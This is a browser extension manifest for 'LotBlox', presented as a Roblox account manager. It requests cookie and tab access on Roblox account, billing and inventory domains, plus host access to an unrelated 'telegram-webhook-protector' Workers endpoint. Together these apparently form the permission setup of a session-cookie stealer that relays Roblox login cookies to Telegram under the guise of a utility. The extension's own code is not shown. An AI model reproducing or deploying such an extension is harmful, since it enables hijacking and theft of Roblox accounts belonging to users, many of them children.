{
  "manifest_version": 3,
  "name": "LotBlox",
  "version": "1.2",
  "description": "Advanced Roblox Account Manager",
  "permissions": [
    "cookies",
    "storage",
    "tabs"
  ],
  "host_permissions": [
    "https://*.roblox.com/*",
    "https://thumbnails.roblox.com/*",
    "https://economy.roblox.com/*",
    "https://users.roblox.com/*",
    "https://inventory.roblox.com/*",
    "https://premium.roblox.com/*",
    "https://billing.roblox.com/*",
    "https://avatar.roblox.com/*",
    "https://telegram-webhook-protector.xarosh228gg.workers.dev/*"
  ],
  "action": {
    "default_popup": "popup.html",
    "default_icon": {
      "16": "icon16.png",
      "48": "icon48.png",
      "128": "icon128.png"
    }
  },
  "icons": {
    "16": "icon16.png",
    "48": "icon48.png",
    "128": "icon128.png"
  },
  "browser_specific_settings": {
    "gecko": {
      "id": "lotblox-manager@extension",
      "strict_min_version": "109.0"
    }
  },
  "content_security_policy": {
    "extension_pages": "script-src 'self'; object-src 'self'"
  }
}